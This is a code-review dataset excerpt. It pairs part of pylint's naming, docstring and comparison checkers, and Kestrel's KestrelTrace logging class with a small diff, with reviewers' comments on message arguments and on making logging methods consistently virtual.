        self._name_category = {}
        self._name_group = {}
        self._bad_names = {}
        self._name_regexps = {}
        self._name_hints = {}

    def open(self):
        self.stats = self.linter.add_stats(badname_module=0,
                                           badname_class=0, badname_function=0,
                                           badname_method=0, badname_attr=0,
                                           badname_const=0,
                                           badname_variable=0,
                                           badname_inlinevar=0,
                                           badname_argument=0,
                                           badname_class_attribute=0)
        for group in self.config.name_group:
            for name_type in group.split(':'):
                self._name_group[name_type] = 'group_%s' % (group,)

        regexps, hints = self._create_naming_rules()
        self._name_regexps = regexps
        self._name_hints = hints

    def _create_naming_rules(self):
        regexps = {}
        hints = {}

        for name_type in KNOWN_NAME_TYPES:
            naming_style_option_name = "%s_naming_style" % (name_type,)
            naming_style_name = getattr(self.config, naming_style_option_name)

            regexps[name_type] = NAMING_STYLES[naming_style_name].get_regex(name_type)

            # A user-supplied regex takes precedence over the chosen style.
            custom_regex_setting_name = "%s_rgx" % (name_type, )
            custom_regex = getattr(self.config, custom_regex_setting_name, None)
            if custom_regex is not None:
                regexps[name_type] = custom_regex

            if custom_regex is not None:
                hints[name_type] = "%r pattern" % custom_regex.pattern
            else:
                hints[name_type] = "%s naming style" % naming_style_name

        return regexps, hints

    @utils.check_messages('blacklisted-name', 'invalid-name')
    def visit_module(self, node):
        self._check_name('module', node.name.split('.')[-1], node)
        self._bad_names = {}

    def leave_module(self, node): # pylint: disable=unused-argument
        # Emit the deferred name warnings: within each name group, keep the
        # smallest set(s) of warnings and raise the rest.
        for all_groups in self._bad_names.values():
            if len(all_groups) < 2:
                continue
            groups = collections.defaultdict(list)
            min_warnings = sys.maxsize
            for group in all_groups.values():
                groups[len(group)].append(group)
                min_warnings = min(len(group), min_warnings)
            if len(groups[min_warnings]) > 1:
                by_line = sorted(groups[min_warnings],
                                 key=lambda group: min(warning[0].lineno
                                                       for warning in group))
                warnings = itertools.chain(*by_line[1:])
            else:
                warnings = groups[min_warnings][0]
            for args in warnings:
                self._raise_name_warning(*args)

    @utils.check_messages('blacklisted-name', 'invalid-name', 'assign-to-new-keyword')
    def visit_classdef(self, node):
        self._check_assign_to_new_keyword_violation(node.name, node)
        self._check_name('class', node.name, node)
        for attr, anodes in node.instance_attrs.items():
            if not any(node.instance_attr_ancestors(attr)):
                self._check_name('attr', attr, anodes[0])

    @utils.check_messages('blacklisted-name', 'invalid-name', 'assign-to-new-keyword')
    def visit_functiondef(self, node):
        # Do not emit any warnings if the method is just an implementation
        # of a base class method.
        self._check_assign_to_new_keyword_violation(node.name, node)
        confidence = interfaces.HIGH
        if node.is_method():
            if utils.overrides_a_method(node.parent.frame(), node.name):
                return
            confidence = (interfaces.INFERENCE if utils.has_known_bases(node.parent.frame())
                          else interfaces.INFERENCE_FAILURE)

        self._check_name(_determine_function_name_type(node, config=self.config),
                         node.name, node, confidence)
        # Check argument names
        args = node.args.args
        if args is not None:
            self._recursive_check_names(args, node)

    visit_asyncfunctiondef = visit_functiondef

    @utils.check_messages('blacklisted-name', 'invalid-name')
    def visit_global(self, node):
        for name in node.names:
            self._check_name('const', name, node)

    @utils.check_messages('blacklisted-name', 'invalid-name', 'assign-to-new-keyword')
    def visit_assignname(self, node):
        """check module level assigned names"""
        self._check_assign_to_new_keyword_violation(node.name, node)
        frame = node.frame()
        ass_type = node.assign_type()
        if isinstance(ass_type, astroid.Comprehension):
            self._check_name('inlinevar', node.name, node)
        elif isinstance(frame, astroid.Module):
            if isinstance(ass_type, astroid.Assign) and not in_loop(ass_type):
                if isinstance(utils.safe_infer(ass_type.value), astroid.ClassDef):
                    self._check_name('class', node.name, node)
            else:
                if not _redefines_import(node):
                    # Don't emit if the name redefines an import
                    # in an ImportError except handler.
                    # NOTE(review): this method continues past the end of this
                    # chunk — body truncated here in this view.
self._check_name('const', node.name, node) elif isinstance(ass_type, astroid.ExceptHandler): self._check_name('variable', node.name, node) elif isinstance(frame, astroid.FunctionDef): # global introduced variable aren't in the function locals if node.name in frame and node.name not in frame.argnames(): if not _redefines_import(node): self._check_name('variable', node.name, node) elif isinstance(frame, astroid.ClassDef): if not list(frame.local_attr_ancestors(node.name)): self._check_name('class_attribute', node.name, node) def _recursive_check_names(self, args, node): """check names in a possibly recursive list <arg>""" for arg in args: if isinstance(arg, astroid.AssignName): self._check_name('argument', arg.name, node) else: self._recursive_check_names(arg.elts, node) def _find_name_group(self, node_type): return self._name_group.get(node_type, node_type) def _raise_name_warning(self, node, node_type, name, confidence): type_label = HUMAN_READABLE_TYPES[node_type] hint = self._name_hints[node_type] if self.config.include_naming_hint: hint += " (%r pattern)" % self._name_regexps[node_type].pattern args = ( type_label.capitalize(), name, hint ) self.add_message('invalid-name', node=node, args=args, confidence=confidence) self.stats['badname_' + node_type] += 1 def _check_name(self, node_type, name, node, confidence=interfaces.HIGH): """check for a name using the type's regexp""" if utils.is_inside_except(node): clobbering, _ = utils.clobber_in_except(node) if clobbering: return if name in self.config.good_names: return if name in self.config.bad_names: self.stats['badname_' + node_type] += 1 self.add_message('blacklisted-name', node=node, args=name) return regexp = self._name_regexps[node_type] match = regexp.match(name) if _is_multi_naming_match(match, node_type, confidence): name_group = self._find_name_group(node_type) bad_name_group = self._bad_names.setdefault(name_group, {}) warnings = bad_name_group.setdefault(match.lastgroup, []) warnings.append((node, 
node_type, name, confidence)) if match is None: self._raise_name_warning(node, node_type, name, confidence) def _check_assign_to_new_keyword_violation(self, name, node): keyword_first_version = self._name_became_keyword_in_version( name, self.KEYWORD_ONSET ) if keyword_first_version is not None: self.add_message('assign-to-new-keyword', node=node, args=(name, keyword_first_version), confidence=interfaces.HIGH) @staticmethod def _name_became_keyword_in_version(name, rules): for version, keywords in rules.items(): if name in keywords and sys.version_info < version: return '.'.join(map(str, version)) return None class DocStringChecker(_BasicChecker): msgs = { 'C0111': ('Missing %s docstring', # W0131 'missing-docstring', 'Used when a module, function, class or method has no docstring.' 'Some special methods like __init__ doesn\'t necessary require a ' 'docstring.'), 'C0112': ('Empty %s docstring', # W0132 'empty-docstring', 'Used when a module, function, class or method has an empty ' 'docstring (it would be too easy ;).'), } options = (('no-docstring-rgx', {'default' : NO_REQUIRED_DOC_RGX, 'type' : 'regexp', 'metavar' : '<regexp>', 'help' : 'Regular expression which should only match ' 'function or class names that do not require a ' 'docstring.'} ), ('docstring-min-length', {'default' : -1, 'type' : 'int', 'metavar' : '<int>', 'help': ('Minimum line length for functions/classes that' ' require docstrings, shorter ones are exempt.')} ), ) def open(self): self.stats = self.linter.add_stats(undocumented_module=0, undocumented_function=0, undocumented_method=0, undocumented_class=0) @utils.check_messages('missing-docstring', 'empty-docstring') def visit_module(self, node): self._check_docstring('module', node) @utils.check_messages('missing-docstring', 'empty-docstring') def visit_classdef(self, node): if self.config.no_docstring_rgx.match(node.name) is None: self._check_docstring('class', node) @staticmethod def _is_setter_or_deleter(node): names = {'setter', 
'deleter'} for decorator in node.decorators.nodes: if (isinstance(decorator, astroid.Attribute) and decorator.attrname in names): return True return False @utils.check_messages('missing-docstring', 'empty-docstring') def visit_functiondef(self, node): if self.config.no_docstring_rgx.match(node.name) is None: ftype = 'method' if node.is_method() else 'function' if node.decorators and self._is_setter_or_deleter(node): return if isinstance(node.parent.frame(), astroid.ClassDef): overridden = False confidence = (interfaces.INFERENCE if utils.has_known_bases(node.parent.frame()) else interfaces.INFERENCE_FAILURE) # check if node is from a method overridden by its ancestor for ancestor in node.parent.frame().ancestors(): if node.name in ancestor and \ isinstance(ancestor[node.name], astroid.FunctionDef): overridden = True break self._check_docstring(ftype, node, report_missing=not overridden, confidence=confidence) elif isinstance(node.parent.frame(), astroid.Module): self._check_docstring(ftype, node) else: return visit_asyncfunctiondef = visit_functiondef def _check_docstring(self, node_type, node, report_missing=True, confidence=interfaces.HIGH): """check the node has a non empty docstring""" docstring = node.doc if docstring is None: if not report_missing: return lines = get_node_last_lineno(node) - node.lineno if node_type == 'module' and not lines: # If the module has no body, there's no reason # to require a docstring. return max_lines = self.config.docstring_min_length if node_type != 'module' and max_lines > -1 and lines < max_lines: return self.stats['undocumented_'+node_type] += 1 if (node.body and isinstance(node.body[0], astroid.Expr) and isinstance(node.body[0].value, astroid.Call)): # Most likely a string with a format call. Let's see. func = utils.safe_infer(node.body[0].value.func) if (isinstance(func, astroid.BoundMethod) and isinstance(func.bound, astroid.Instance)): # Strings in Python 3, others in Python 2. 
if PY3K and func.bound.name == 'str': return if func.bound.name in ('str', 'unicode', 'bytes'): return self.add_message('missing-docstring', node=node, args=(node_type,), confidence=confidence) elif not docstring.strip(): self.stats['undocumented_'+node_type] += 1 self.add_message('empty-docstring', node=node, args=(node_type,), confidence=confidence) class PassChecker(_BasicChecker): """check if the pass statement is really necessary""" msgs = {'W0107': ('Unnecessary pass statement', 'unnecessary-pass', 'Used when a "pass" statement that can be avoided is ' 'encountered.'), } @utils.check_messages('unnecessary-pass') def visit_pass(self, node): if len(node.parent.child_sequence(node)) > 1: self.add_message('unnecessary-pass', node=node) class LambdaForComprehensionChecker(_BasicChecker): """check for using a lambda where a comprehension would do. See <http://www.artima.com/weblogs/viewpost.jsp?thread=98196> where GvR says comprehensions would be clearer. """ msgs = {'W0110': ('map/filter on lambda could be replaced by comprehension', 'deprecated-lambda', 'Used when a lambda is the first argument to "map" or ' '"filter". It could be clearer as a list ' 'comprehension or generator expression.', {'maxversion': (3, 0)}), } @utils.check_messages('deprecated-lambda') def visit_call(self, node): """visit a Call node, check if map or filter are called with a lambda """ if not node.args: return if not isinstance(node.args[0], astroid.Lambda): return infered = utils.safe_infer(node.func) if (utils.is_builtin_object(infered) and infered.name in ['map', 'filter']): self.add_message('deprecated-lambda', node=node) def _is_one_arg_pos_call(call): """Is this a call with exactly 1 argument, where that argument is positional? 
""" return (isinstance(call, astroid.Call) and len(call.args) == 1 and not call.keywords) class ComparisonChecker(_BasicChecker): """Checks for comparisons - singleton comparison: 'expr == True', 'expr == False' and 'expr == None' - yoda condition: 'const "comp" right' where comp can be '==', '!=', '<', '<=', '>' or '>=', and right can be a variable, an attribute, a method or a function """ msgs = {'C0121': ('Comparison to %s should be %s', 'singleton-comparison', 'Used when an expression is compared to singleton ' 'values like True, False or None.'), 'C0122': ('Comparison should be %s', 'misplaced-comparison-constant', 'Used when the constant is placed on the left side ' 'of a comparison. It is usually clearer in intent to ' 'place it in the right hand side of the comparison.'), 'C0123': ('Using type() instead of isinstance() for a typecheck.', 'unidiomatic-typecheck', 'The idiomatic way to perform an explicit typecheck in ' 'Python is to use isinstance(x, Y) rather than ' 'type(x) == Y, type(x) is Y. 
Though there are unusual ' 'situations where these give different results.', {'old_names': [('W0154', 'unidiomatic-typecheck')]}), 'R0123': ('Comparison to literal', 'literal-comparison', 'Used when comparing an object to a literal, which is usually ' 'what you do not want to do, since you can compare to a different ' 'literal than what was expected altogether.'), } def _check_singleton_comparison(self, singleton, root_node, negative_check=False): if singleton.value is True: if not negative_check: suggestion = "just 'expr' or 'expr is True'" else: suggestion = "just 'not expr' or 'expr is False'" self.add_message('singleton-comparison', node=root_node, args=(True, suggestion)) elif singleton.value is False: if not negative_check: suggestion = "'not expr' or 'expr is False'" else: suggestion = "'expr' or 'expr is not False'" self.add_message('singleton-comparison', node=root_node, args=(False, suggestion)) elif singleton.value is None: if not negative_check: suggestion = "'expr is None'" else: suggestion = "'expr is not None'" self.add_message('singleton-comparison', node=root_node, args=(None, suggestion)) def _check_literal_comparison(self, literal, node): """Check if we compare to a literal, which is usually what we do not want to do.""" nodes = (astroid.List, astroid.Tuple, astroid.Dict, astroid.Set) is_other_literal = isinstance(literal, nodes) is_const = False if isinstance(literal, astroid.Const): if literal.value in (True, False, None): # Not interested in this values. 
return is_const = isinstance(literal.value, (bytes, str, int, float)) if is_const or is_other_literal: self.add_message('literal-comparison', node=node) def _check_misplaced_constant(self, node, left, right, operator): if isinstance(right, astroid.Const): return operator = REVERSED_COMPS.get(operator, operator) suggestion = '%s %s %r' % (right.as_string(), operator, left.value) self.add_message('misplaced-comparison-constant', node=node, args=(suggestion,)) @utils.check_messages('singleton-comparison', 'misplaced-comparison-constant', 'unidiomatic-typecheck', 'literal-comparison') def visit_compare(self, node): self._check_unidiomatic_typecheck(node) # NOTE: this checker only works with binary comparisons like 'x == 42' # but not 'x == y == 42' if len(node.ops) != 1: return left = node.left operator, right = node.ops[0] if (operator in ('<', '<=', '>', '>=', '!=', '==') and isinstance(left, astroid.Const)): self._check_misplaced_constant(node, left, right, operator) if operator == '==': if isinstance(left, astroid.Const): self._check_singleton_comparison(left, node) elif isinstance(right, astroid.Const): self._check_singleton_comparison(right, node) if operator == '!=': if isinstance(right, astroid.Const): self._check_singleton_comparison(right, node, negative_check=True) if operator in ('is', 'is not'): self._check_literal_comparison(right, node) def _check_unidiomatic_typecheck(self, node): operator, right = node.ops[0] if operator in TYPECHECK_COMPARISON_OPERATORS: left = node.left if _is_one_arg_pos_call(left): self._check_type_x_is_y(node, left, operator, right) def _check_type_x_is_y(self, node, left, operator, right): """Check for expressions like type(x) == Y.""" left_func = utils.safe_infer(left.func) if not (isinstance(left_func, astroid.ClassDef) and left_func.qname() == TYPE_QNAME): return if operator in ('is', 'is not') and _is_one_arg_pos_call(right): right_func = utils.safe_infer(right.func) if (isinstance(right_func, astroid.ClassDef) and 
right_func.qname() == TYPE_QNAME): # type(x) == type(a) right_arg = utils.safe_infer(right.args[0]) if not isinstance(right_arg, LITERAL_NODE_TYPES): # not e.g. type(x) == type([]) return self.add_message('unidiomatic-typecheck', node=node) def register(linter): """required method to auto register this checker""" linter.register_checker(BasicErrorChecker(linter)) linter.register_checker(BasicChecker(linter)) linter.register_checker(NameChecker(linter)) linter.register_checker(DocStringChecker(linter)) linter.register_checker(PassChecker(linter)) linter.register_checker(LambdaForComprehensionChecker(linter)) linter.register_checker(ComparisonChecker(linter))
1
10,149
Can we remove the argument from this message? A message will include a line number already that points to the place in the code that has the problem. I think we can remove it.
PyCQA-pylint
py
@@ -174,7 +174,7 @@ namespace Microsoft.AspNetCore.Server.Kestrel.Core.Internal _requestBodyMinimumDataRateNotSatisfied(_logger, connectionId, traceIdentifier, rate, null); } - public void ResponseMininumDataRateNotSatisfied(string connectionId, string traceIdentifier) + public virtual void ResponseMininumDataRateNotSatisfied(string connectionId, string traceIdentifier) { _responseMinimumDataRateNotSatisfied(_logger, connectionId, traceIdentifier, null); }
1
// Copyright (c) .NET Foundation. All rights reserved. // Licensed under the Apache License, Version 2.0. See License.txt in the project root for license information. using System; using Microsoft.AspNetCore.Server.Kestrel.Core.Internal.Http2; using Microsoft.AspNetCore.Server.Kestrel.Core.Internal.Http2.HPack; using Microsoft.AspNetCore.Server.Kestrel.Core.Internal.Infrastructure; using Microsoft.Extensions.Logging; namespace Microsoft.AspNetCore.Server.Kestrel.Core.Internal { public class KestrelTrace : IKestrelTrace { private static readonly Action<ILogger, string, Exception> _connectionStart = LoggerMessage.Define<string>(LogLevel.Debug, 1, @"Connection id ""{ConnectionId}"" started."); private static readonly Action<ILogger, string, Exception> _connectionStop = LoggerMessage.Define<string>(LogLevel.Debug, 2, @"Connection id ""{ConnectionId}"" stopped."); private static readonly Action<ILogger, string, Exception> _connectionPause = LoggerMessage.Define<string>(LogLevel.Debug, 4, @"Connection id ""{ConnectionId}"" paused."); private static readonly Action<ILogger, string, Exception> _connectionResume = LoggerMessage.Define<string>(LogLevel.Debug, 5, @"Connection id ""{ConnectionId}"" resumed."); private static readonly Action<ILogger, string, Exception> _connectionKeepAlive = LoggerMessage.Define<string>(LogLevel.Debug, 9, @"Connection id ""{ConnectionId}"" completed keep alive response."); private static readonly Action<ILogger, string, Exception> _connectionDisconnect = LoggerMessage.Define<string>(LogLevel.Debug, 10, @"Connection id ""{ConnectionId}"" disconnecting."); private static readonly Action<ILogger, string, string, Exception> _applicationError = LoggerMessage.Define<string, string>(LogLevel.Error, 13, @"Connection id ""{ConnectionId}"", Request id ""{TraceIdentifier}"": An unhandled exception was thrown by the application."); private static readonly Action<ILogger, Exception> _notAllConnectionsClosedGracefully = LoggerMessage.Define(LogLevel.Debug, 
16, "Some connections failed to close gracefully during server shutdown."); private static readonly Action<ILogger, string, string, Exception> _connectionBadRequest = LoggerMessage.Define<string, string>(LogLevel.Information, 17, @"Connection id ""{ConnectionId}"" bad request data: ""{message}"""); private static readonly Action<ILogger, string, long, Exception> _connectionHeadResponseBodyWrite = LoggerMessage.Define<string, long>(LogLevel.Debug, 18, @"Connection id ""{ConnectionId}"" write of ""{count}"" body bytes to non-body HEAD response."); private static readonly Action<ILogger, string, Exception> _requestProcessingError = LoggerMessage.Define<string>(LogLevel.Information, 20, @"Connection id ""{ConnectionId}"" request processing ended abnormally."); private static readonly Action<ILogger, Exception> _notAllConnectionsAborted = LoggerMessage.Define(LogLevel.Debug, 21, "Some connections failed to abort during server shutdown."); private static readonly Action<ILogger, TimeSpan, DateTimeOffset, Exception> _heartbeatSlow = LoggerMessage.Define<TimeSpan, DateTimeOffset>(LogLevel.Warning, 22, @"Heartbeat took longer than ""{interval}"" at ""{now}""."); private static readonly Action<ILogger, string, Exception> _applicationNeverCompleted = LoggerMessage.Define<string>(LogLevel.Critical, 23, @"Connection id ""{ConnectionId}"" application never completed"); private static readonly Action<ILogger, string, Exception> _connectionRejected = LoggerMessage.Define<string>(LogLevel.Warning, 24, @"Connection id ""{ConnectionId}"" rejected because the maximum number of concurrent connections has been reached."); private static readonly Action<ILogger, string, string, Exception> _requestBodyStart = LoggerMessage.Define<string, string>(LogLevel.Debug, 25, @"Connection id ""{ConnectionId}"", Request id ""{TraceIdentifier}"": started reading request body."); private static readonly Action<ILogger, string, string, Exception> _requestBodyDone = LoggerMessage.Define<string, 
string>(LogLevel.Debug, 26, @"Connection id ""{ConnectionId}"", Request id ""{TraceIdentifier}"": done reading request body."); private static readonly Action<ILogger, string, string, double, Exception> _requestBodyMinimumDataRateNotSatisfied = LoggerMessage.Define<string, string, double>(LogLevel.Information, 27, @"Connection id ""{ConnectionId}"", Request id ""{TraceIdentifier}"": the request timed out because it was not sent by the client at a minimum of {Rate} bytes/second."); private static readonly Action<ILogger, string, string, Exception> _responseMinimumDataRateNotSatisfied = LoggerMessage.Define<string, string>(LogLevel.Information, 28, @"Connection id ""{ConnectionId}"", Request id ""{TraceIdentifier}"": the connection was closed becuase the response was not read by the client at the specified minimum data rate."); private static readonly Action<ILogger, string, Exception> _http2ConnectionError = LoggerMessage.Define<string>(LogLevel.Information, 29, @"Connection id ""{ConnectionId}"": HTTP/2 connection error."); private static readonly Action<ILogger, string, Exception> _http2StreamError = LoggerMessage.Define<string>(LogLevel.Information, 30, @"Connection id ""{ConnectionId}"": HTTP/2 stream error."); private static readonly Action<ILogger, string, int, Exception> _hpackDecodingError = LoggerMessage.Define<string, int>(LogLevel.Information, 31, @"Connection id ""{ConnectionId}"": HPACK decoding error while decoding headers for stream ID {StreamId}."); protected readonly ILogger _logger; public KestrelTrace(ILogger logger) { _logger = logger; } public virtual void ConnectionStart(string connectionId) { _connectionStart(_logger, connectionId, null); } public virtual void ConnectionStop(string connectionId) { _connectionStop(_logger, connectionId, null); } public virtual void ConnectionPause(string connectionId) { _connectionPause(_logger, connectionId, null); } public virtual void ConnectionResume(string connectionId) { _connectionResume(_logger, 
connectionId, null); } public virtual void ConnectionKeepAlive(string connectionId) { _connectionKeepAlive(_logger, connectionId, null); } public void ConnectionRejected(string connectionId) { _connectionRejected(_logger, connectionId, null); } public virtual void ConnectionDisconnect(string connectionId) { _connectionDisconnect(_logger, connectionId, null); } public virtual void ApplicationError(string connectionId, string traceIdentifier, Exception ex) { _applicationError(_logger, connectionId, traceIdentifier, ex); } public virtual void ConnectionHeadResponseBodyWrite(string connectionId, long count) { _connectionHeadResponseBodyWrite(_logger, connectionId, count, null); } public void NotAllConnectionsClosedGracefully() { _notAllConnectionsClosedGracefully(_logger, null); } public void ConnectionBadRequest(string connectionId, BadHttpRequestException ex) { _connectionBadRequest(_logger, connectionId, ex.Message, ex); } public virtual void RequestProcessingError(string connectionId, Exception ex) { _requestProcessingError(_logger, connectionId, ex); } public void NotAllConnectionsAborted() { _notAllConnectionsAborted(_logger, null); } public virtual void HeartbeatSlow(TimeSpan interval, DateTimeOffset now) { _heartbeatSlow(_logger, interval, now, null); } public virtual void ApplicationNeverCompleted(string connectionId) { _applicationNeverCompleted(_logger, connectionId, null); } public virtual void RequestBodyStart(string connectionId, string traceIdentifier) { _requestBodyStart(_logger, connectionId, traceIdentifier, null); } public virtual void RequestBodyDone(string connectionId, string traceIdentifier) { _requestBodyDone(_logger, connectionId, traceIdentifier, null); } public void RequestBodyMininumDataRateNotSatisfied(string connectionId, string traceIdentifier, double rate) { _requestBodyMinimumDataRateNotSatisfied(_logger, connectionId, traceIdentifier, rate, null); } public void ResponseMininumDataRateNotSatisfied(string connectionId, string 
traceIdentifier) { _responseMinimumDataRateNotSatisfied(_logger, connectionId, traceIdentifier, null); } public void Http2ConnectionError(string connectionId, Http2ConnectionErrorException ex) { _http2ConnectionError(_logger, connectionId, ex); } public void Http2StreamError(string connectionId, Http2StreamErrorException ex) { _http2StreamError(_logger, connectionId, ex); } public void HPackDecodingError(string connectionId, int streamId, HPackDecodingException ex) { _hpackDecodingError(_logger, connectionId, streamId, ex); } public virtual void Log<TState>(LogLevel logLevel, EventId eventId, TState state, Exception exception, Func<TState, Exception, string> formatter) => _logger.Log(logLevel, eventId, state, exception, formatter); public virtual bool IsEnabled(LogLevel logLevel) => _logger.IsEnabled(logLevel); public virtual IDisposable BeginScope<TState>(TState state) => _logger.BeginScope(state); } }
1
14,318
This whole class is now a mix of virtual and non-virtual. I tried to see what would happen if I made everything non-virtual in dev, and the build still passes. It turns out that none of the other methods actually need to be virtual. Can you make *all* the logging methods either virtual or not for consistency? Thanks.
aspnet-KestrelHttpServer
.cs